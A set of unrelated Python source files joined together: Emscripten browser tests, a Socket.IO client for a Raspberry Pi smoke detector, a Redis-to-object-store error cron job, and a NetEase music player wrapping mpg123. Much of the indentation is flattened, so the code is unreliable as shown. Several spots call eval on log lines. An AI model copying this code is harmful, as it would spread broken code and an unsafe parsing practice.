self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html'], timeout=30)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html'], timeout=30)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
    os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT();
}
'''))
# Test that it is possible to define "Module.pthreadMainPrefixURL" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { pthreadMainPrefixURL: "cdn/", '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print 'aborting malloc=' + str(aborting_malloc)
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=134217728'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# test atomicrmw i64
def test_atomicrmw_i64(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)]*256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print opts
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.html'] + opts).communicate()
self.run_browser('test.html', None, '/report_result?0')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
Popen([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js']).communicate()
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
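  # EMTERPRETIFY_FILE emits the emterpreter bytecode into a separate file
  # (code.dat); the custom shell below fetches it via XHR and hands it to the
  # runtime through Module.emterpreterFile before loading test.js.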
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
    try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
    try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print opts
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
for o in [0, 1, 2]:
print o
opts = ['-O' + str(o)]
print 'plain html'
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print 'default html'
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2*1024*1024
open('huge.dat', 'w').write(''.join([chr((x*x)&255) for x in range(size*2)])) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=100000000', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
def test_binaryen(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args+['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1'])
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'TOTAL_MEMORY='+str(16*1024*1024), '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
|
client.py
|
import socketio
from utils.utility import uploadImg
from utils.analysis import analysis
from hardware.controller import Controller
import subprocess
import time
import threading
print("Start Running Client ...")
controller = Controller()
# standard Python
sio = socketio.Client()
host = "https://smartsmokedetection.herokuapp.com/"
# host = "http://localhost:5000"
# host = "https://c6d8171fbc15.ngrok.io"
# NOTE: connect() is called at the bottom of this file, after all event
# handlers are registered; connecting here would race the handlers below.
@sio.event
def connect():
print("Socket connected to server at " + host)
@sio.event
def connect_error():
print("The connection failed!")
@sio.event
def disconnect():
print("I'm disconnected!")
@sio.on("watch")
def watch():
# Get smoke status and call pi camera
print("Watching ...")
# Call MQ2
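    # NOTE: each log line is a Python dict literal; ast.literal_eval would be
    # a safer parser than eval here.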
data = eval(readLastLog())
# Call pi camera
path = controller.get_picture()
link = uploadImg(path)
data["link"] = link
data["analysis_link"] = uploadImg(analysis(20))
print("Watched !")
return data
@sio.on("close_door")
def close_door():
# Close the door
print("close_door")
controller.servo_close()
controller.LED_off()
return {"OK": True}
@sio.on("close_alert")
def close_alert():
# Close the alert
controller.buzzer_off()
print("close_alert")
@sio.on("test")
def test():
# Open door, led and watch
print("Start testing ...")
# controller.servo_open()
# controller.LED_on()
# controller.buzzer_on()
# SendFireMsg
data = eval(readLastLog())
sendFireMsg(data)
data["OK"] = True
return data
def sendMsg(msg): # Send Msg
sio.emit("msg", msg)
def sendFireMsg(data):
print("Sending Fire Msg")
controller.buzzer_on()
controller.LED_on()
controller.servo_open()
path = controller.get_picture()
print(path)
link = uploadImg(path)
data["link"] = link
sio.emit("fire", data)
def readLog():
f = open("result.log", "r")
while 1:
where = f.tell()
lines = f.readlines()
lastTen = lines[-10:]
for d in lastTen:
if not d:
continue
data = eval(d[:-1])
if data["CO"] > 88:
sendFireMsg(data)
break
time.sleep(10)
f.seek(where)
def readLastLog():
f = open("result.log", "r")
lines = f.readlines()
return lines[-1][:-1]
# Connect only after every handler is registered so the initial "connect"
# event is not missed.
sio.connect(host)
log_thread = threading.Thread(target=readLog)
log_thread.start()
|
cronerror.py
|
from events.processrepo import ProcessRepo
import threading
from threading import Thread
from configs.configs import error_cron_interval_sec, shared_storage_path, error_prefix, error_batch_size
from .cronrepo import StoreRepo
import logging
from events.errorrepo import ErrorRepo
from utils.cronjobutils import StoreUtils
import os
from datetime import datetime
from logging.config import dictConfig
log = logging.getLogger('file')
storerepo = StoreRepo()
errorepo = ErrorRepo()
storeutils = StoreUtils()
prorepo = ProcessRepo()
class ErrorProcessor(Thread):
def __init__(self, event):
Thread.__init__(self)
self.stopped = event
# Cron JOB to fetch error records from redis store and to save on object store using file-store API
def run(self):
run = 0
while not self.stopped.wait(eval(str(error_cron_interval_sec))):
log.info(f'Error Processor run :{run}')
try:
log.info('Fetching SRNs from redis store')
srn_list = storerepo.get_unique_srns()
if srn_list:
log.info(f'Error records on {len(srn_list)} SRNs present in redis store')
log.info(f'Error processing initiated --------------- run : {run}')
self.initiate_error_processing(srn_list)
log.info(f'Error Processing completed --------------- run : {run}')
else:
log.info('Received 0 SRNs from redis store')
run += 1
except Exception as e:
run += 1
log.exception(f'Exception on ErrorProcessor on run : {run} , exception : {e}')
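    # A minimal usage sketch (assumed entry point, not part of this module):
    #
    #   stop_flag = threading.Event()
    #   ErrorProcessor(stop_flag).start()   # wakes up every error_cron_interval_sec
    #   ...
    #   stop_flag.set()                     # ends the cron loop on the next wake-up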
    # Fetch all error records from redis for each SRN and pass them on to the
    # upload service.
def initiate_error_processing(self,srn_list):
try:
for srn in srn_list:
log.info(f'Creating aggregated error report for srn-- {srn}')
er_query = {"serviceRequestNumber": srn}
exclude = {"_id": False}
log.info(f'Search for error reports of SRN -- {srn} from db started')
error_records = errorepo.search(er_query, exclude, None, None)
error_records = [x for x in error_records if not x.get("uploaded")]
log.info(f'Returned {len(error_records)} records')
file = f'{shared_storage_path}consolidated-error-{error_records[0]["datasetName"].replace(" ","-")}-{srn}.csv'
headers = ['Stage','Error Message', 'Record Count']
fields = ['stage','message','count']
storeutils.write_to_csv(error_records,file,srn,headers,fields)
agg_file = storeutils.file_store_upload_call(file,file.replace("/opt/",""),error_prefix)
update_query = {"serviceRequestNumber": srn, "uploaded": True, "time_stamp": str(datetime.now()), "consolidated_file": agg_file, "file": None, "count" : None}
condition = {"serviceRequestNumber": srn, "uploaded": True}
errorepo.update(condition,update_query,True)
query = {"serviceRequestNumber" : srn,"status" : "Completed"}
#getting record from mongo matching srn, if present
completed_stats = prorepo.count(query)
#create error file when the job is completed
if completed_stats == 1:
#srn.uuid - pattern of all keys in redis
pattern = f'{srn}.*'
#getting all keys matching the patterns
error_records_keys = storerepo.get_keys_matching_pattern(pattern)
#counting keys matching the pattern, to get the count of error records on redis store against respective srn
error_records_count = len(error_records_keys)
log.info(f'{error_records_count} records found in redis store for srn -- {srn}')
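                    # Chunk the keys so each pass handles at most error_batch_size records.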
keys_list=[error_records_keys[i:i + error_batch_size] for i in range(0, len(error_records_keys), error_batch_size)]
for i,keys in enumerate(keys_list):
#fetching back all the records from redis store using the srn keys
error_records = storerepo.get_all_records(keys,None)
log.info(f'Received {len(error_records)} records from redis store for srn -- {srn}')
if error_records:
zip_file,zip_file_name=self.create_error_file(error_records,srn,i)
log.info(f'Completed csv creation for srn-- {srn} ')
#forking a new thread
log.info(f'Initiating upload process for srn -- {srn} on a new fork')
persister = threading.Thread(target=self.upload_error_to_object_store, args=(srn,zip_file,zip_file_name,error_records_count))
persister.start()
#removing records from redis
remover = threading.Thread(target=storerepo.delete,args=(error_records_keys,))
remover.start()
else:
log.info(f'No new records left for uploading, for srn -- {srn}')
except Exception as e:
log.exception(f"Exception on error processing {e}")
    # Write one batch of error records to a local csv and zip it up.
def create_error_file(self, error_records, srn,index):
try:
csv_file = f'{shared_storage_path}error-{error_records[0]["datasetName"].replace(" ","-")}-{srn}-{index}.csv'
zip_file= f'{shared_storage_path}error-{error_records[0]["datasetName"].replace(" ","-")}-{srn}.zip'
log.info(f'Writing {len(error_records)} errors to {csv_file} for srn -- {srn}')
#writing to csv locally
headers = ['Stage', 'Error Message', 'Record', 'Original Record']
fields = ['stage','message','record','originalRecord']
storeutils.write_to_csv(error_records,csv_file,srn,headers,fields)
storeutils.zipfile_creation(csv_file,zip_file)
log.info(f"zip file created :{zip_file} , for srn -- {srn}, ")
return zip_file,zip_file.replace("/opt/","")
except Exception as e:
log.exception(f'Exception while ingesting errors to object store: {e}')
            return None, None  # keep the two-value shape expected by the caller
def upload_error_to_object_store(self,srn,file,file_name,error_records_count):
#initiating upload API call
error_object_path = storeutils.file_store_upload_call(file,file_name,error_prefix)
        if error_object_path is False:
return None
log.info(f'Error file uploaded on to object store : {error_object_path} for srn -- {srn} ')
cond = {"serviceRequestNumber": srn, "uploaded": True}
error_record = {"$set":{ "file": error_object_path, "count": error_records_count}}
#updating record on mongo with uploaded error count
errorepo.update(cond,error_record,False)
log.info(f'Updated db record for SRN after creating final report -- {srn}')
# Log config
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'info': {
'class': 'logging.FileHandler',
'level': 'DEBUG',
'formatter': 'default',
'filename': 'info.log'
},
'console': {
'class': 'logging.StreamHandler',
'level': 'DEBUG',
'formatter': 'default',
'stream': 'ext://sys.stdout',
}
},
'loggers': {
'file': {
'level': 'DEBUG',
'handlers': ['info', 'console'],
'propagate': ''
}
},
'root': {
'level': 'DEBUG',
'handlers': ['info', 'console']
}
})
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: AlanAlbert
# @Last Modified time: 2018-11-21 14:00:00
"""
NetEase Cloud Music Player
"""
# Let's make some noise
from __future__ import print_function, unicode_literals, division, absolute_import
import subprocess
import threading
import time
import os
import random
from future.builtins import str
from .ui import Ui
from .storage import Storage
from .api import NetEase
from .cache import Cache
from .config import Config
from .utils import notify
from . import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
self.ui = Ui()
self.popen_handler = None
        # Stop flag: prevents the playback thread from starting.
        self.playing_flag = False
        self.refresh_url_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database["player_info"]
@property
def songs(self):
return self.storage.database["songs"]
@property
def index(self):
return self.info["idx"]
@property
def list(self):
return self.info["player_list"]
@property
def order(self):
return self.info["playing_order"]
@property
def mode(self):
return self.info["playing_mode"]
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get("notifier")
@property
def config_mpg123(self):
return self.config.get("mpg123_parameters")
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song["song_id"]
@property
def playing_name(self):
return self.current_song["song_name"]
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify(
"正在播放: {}\n{}-{}".format(
song["song_name"], song["artist"], song["album_name"]
)
)
def notify_copyright_issue(self):
log.warning(
"Song {} is unavailable due to copyright issue.".format(self.playing_id)
)
notify("版权限制,无法播放此歌曲")
def change_mode(self, step=1):
self.info["playing_mode"] = (self.info["playing_mode"] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
self.ui.build_playinfo(
self.current_song["song_name"],
self.current_song["artist"],
self.current_song["album_name"],
self.current_song["quality"],
time.time(),
pause=not self.playing_flag,
)
def add_songs(self, songs):
for song in songs:
song_id = str(song["song_id"])
self.info["player_list"].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def refresh_urls(self):
songs = self.api.dig_info(self.list, "refresh_urls")
if songs:
for song in songs:
song_id = str(song["song_id"])
if song_id in self.songs:
self.songs[song_id]["mp3_url"] = song["mp3_url"]
self.songs[song_id]["expires"] = song["expires"]
self.songs[song_id]["get_time"] = song["get_time"]
else:
self.songs[song_id] = song
            self.refresh_url_flag = True
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b"Q\n")
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info["playing_volume"] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info["playing_volume"] = new_volume
self.popen_handler.stdin.write(
"V {}\n".format(self.info["playing_volume"]).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b"P\n")
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url, expires=-1, get_time=-1):
para = ["mpg123", "-R"] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b"L " + url.encode("utf-8") + b"\n")
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
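        # mpg123 -R (remote control mode) reports status on stdout:
        #   "@F <frame> <frames-left> <seconds> <seconds-left>" while playing,
        #   "@E ..." on errors, and "@P 0" when playback finishes.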
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode("utf-8").strip()
if strout[:2] == "@F":
# playing, update progress
out = strout.split(" ")
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == "@E":
self.playing_flag = True
if (
expires >= 0
and get_time >= 0
and time.time() - expires - get_time >= 0
):
                    # Refresh the stream URL
self.refresh_urls()
else:
# error, stop song and move to next
self.notify_copyright_issue()
break
elif strout == "@P 0":
# end, moving to next
self.playing_flag = True
break
elif strout == "":
endless_loop_cnt += 1
                # mpg123 sometimes keeps emitting empty lines instead of
                # exiting after playback; bail out of the loop here.
if endless_loop_cnt > 100:
log.warning(
"mpg123 error, halt, endless loop and high cpu use, then we kill it"
)
break
if self.playing_flag:
            if self.refresh_url_flag:
                self.stop()
                self.replay()
                self.refresh_url_flag = False
else:
self.next()
else:
self.stop()
    def download_lyric(self, is_translated=False):
        key = "lyric" if not is_translated else "tlyric"
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
        if not is_translated:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
"""
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and args is a lists/tuple of args
that would give to subprocess.Popen.
"""
# log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if "cache" in args.keys() and os.path.isfile(args["cache"]):
thread = threading.Thread(
target=self.run_mpg123, args=(on_exit, args["cache"])
)
else:
            new_url = NetEase().songs_url([args["song_id"]])[0]["url"]  # fetch a fresh URL
            if not new_url:  # no fresh URL obtained
                new_url = args["mp3_url"]  # fall back to the stored URL for mpg123
thread = threading.Thread(
target=self.run_mpg123,
args=(on_exit, new_url, args["expires"], args["get_time"]),
)
cache_thread = threading.Thread(
target=self.download_song,
args=(
args["song_id"],
args["song_name"],
args["artist"],
args["mp3_url"],
),
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(
target=self.download_lyric, args=(True,)
)
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug("Callback")
self.end_callback()
return
if not self.current_song:
return
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info["random_index"] = 0
def new_player_list(self, type, title, datalist, offset):
self.info["player_list_type"] = type
self.info["player_list_title"] = title
# self.info['idx'] = offset
self.info["player_list"] = []
self.info["playing_order"] = []
self.info["random_index"] = 0
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
    # switch_flag is True when the selection is inside the playing list, or
    # when the current list type is not one of "songs", "djchannels", "fmsongs".
def play_or_pause(self, idx, switch_flag):
if self.is_empty:
return
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx and switch_flag:
if not self.popen_handler:
self.replay()
else:
self.switch()
else:
self.info["idx"] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info["random_index"]
if (
random_index >= len(playing_order)
or playing_order[random_index] != self.index
):
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
# make sure self.index will not over
if self.info["idx"] < playlist_len:
self.info["idx"] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
playing_order_len = len(self.order)
self.info["random_index"] += 1
# Out of border
if self.mode == Player.MODE_RANDOM_LOOP:
self.info["random_index"] %= playing_order_len
# Random but not loop, out of border, stop playing.
if self.info["random_index"] >= playing_order_len:
self.info["idx"] = playlist_len
else:
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
